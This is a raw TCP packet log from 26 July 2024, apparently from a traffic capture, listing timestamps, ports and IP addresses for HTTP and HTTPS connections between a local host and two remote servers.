Jul 26, 2024 13:02:46.533323050 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.533353090 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.533375978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.533406973 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.533426046 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.534231901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.534264088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.534285069 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.534313917 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.534344912 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.534394026 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.535207033 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.535239935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.535270929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.535290956 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.535320997 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.535351992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.535402060 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.536169052 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.536201954 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.536233902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.536251068 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.536281109 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.536393881 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.537152052 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.537184000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.537215948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.537235975 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.537266016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.537297010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.537348032 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.538100004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.538131952 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.538163900 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.538182974 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.538212061 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.538248062 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.539061069 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539093018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539120913 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539139986 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.539170980 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539202929 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539222002 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.539249897 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.539447069 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.540008068 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540040016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540071011 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540090084 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.540119886 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540168047 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.540915012 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540946960 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540978909 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.540997028 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.541027069 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541053057 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541101933 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.541778088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541810036 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541841030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541866064 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.541893005 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541924000 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.541944027 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.542594910 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.542628050 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.542645931 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.542675018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.542706966 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.542757988 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.543401003 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.543432951 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.543462992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.543482065 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.543514013 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.543560028 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.610579014 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.610634089 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.610877037 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.611155987 CEST	49178	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.611174107 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.611176968 CEST	443	49178	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.611334085 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.611366987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.611399889 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.611442089 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.611500025 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.612071991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612104893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612137079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612169027 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612195969 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.612905025 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612938881 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612978935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.612993002 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.613023996 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.613080978 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.613826036 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.613858938 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.613923073 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.613955975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.613987923 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.614016056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.614181995 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.614746094 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.614778042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.614810944 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.614833117 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.614862919 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615125895 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.615712881 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615746021 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615777016 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615803957 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.615830898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615863085 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.615917921 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.616626978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.616660118 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.616691113 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.616724014 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.616753101 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.617439985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617474079 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617503881 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.617527962 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617561102 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617592096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617618084 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.617649078 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.617700100 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.618741035 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.618773937 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.618804932 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.618828058 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.618858099 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.618889093 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.618946075 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.619692087 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619728088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619759083 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619791031 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619815111 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.619843006 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619874001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.619929075 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.620316982 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620352030 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620383978 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620415926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620440960 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.620469093 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620523930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.620584965 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.621104956 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621136904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621201992 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621233940 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621253967 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.621284008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621320963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.621371031 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625328064 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625376940 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625407934 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625441074 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625466108 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625492096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625523090 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625554085 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625581026 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625606060 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625636101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625667095 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625691891 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625720024 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625751972 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625783920 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625804901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625837088 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625876904 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625890970 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.625921011 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625951052 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.625977039 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.626080990 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.627152920 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627186060 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627218008 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627249956 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.627269983 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627304077 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627358913 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.627698898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627815962 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627849102 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.627876997 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.628309965 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628344059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628376961 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628403902 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.628432989 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628681898 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628741026 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628753901 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.628783941 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628815889 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628844023 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.628869057 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628900051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.628953934 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.629983902 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630017042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630048990 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630099058 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630117893 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.630419970 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630450964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630472898 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.630503893 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630537987 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.630604982 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.661436081 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.661473036 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.661541939 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.662431002 CEST	49179	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:46.662441015 CEST	443	49179	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:46.697242975 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697309971 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697345018 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697380066 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697412968 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.697443962 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.697613955 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697649002 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697946072 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.697978020 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698009014 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.698035002 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698070049 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698126078 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.698645115 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698677063 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698709965 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698751926 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.698765039 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.698820114 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.699399948 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.699434042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.699466944 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.699493885 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.699938059 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.699969053 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700001001 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700030088 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.700053930 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700534105 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.700706959 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700740099 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700772047 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700795889 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.700824976 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700855970 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.700911999 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.701548100 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.701580048 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.701611042 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.701639891 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.701664925 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702275991 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702307940 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702332020 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.702359915 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702392101 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702423096 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.702447891 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.703121901 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703155041 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703186035 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703207016 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.703236103 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703268051 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703322887 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.703860044 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703892946 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703923941 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.703949928 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.703977108 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704546928 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.704607964 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704641104 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704672098 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704693079 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.704721928 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704754114 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704773903 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.704804897 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704837084 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.704860926 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.705527067 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705559015 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705590963 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705612898 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.705641985 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705672979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705704927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705727100 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.705756903 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.705813885 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.706458092 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.706489086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.706521988 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.706542015 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.706572056 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.706604004 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.706628084 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.706655979 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.707261086 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.707297087 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.707340002 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.747210026 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.752368927 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752430916 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752465010 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752516985 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.752795935 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752829075 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752861977 CEST	80	49177	198.46.176.133	192.168.2.22
Jul 26, 2024 13:02:46.752882004 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:46.752914906 CEST	80	49177	198.46.176.133	192.168.2.22
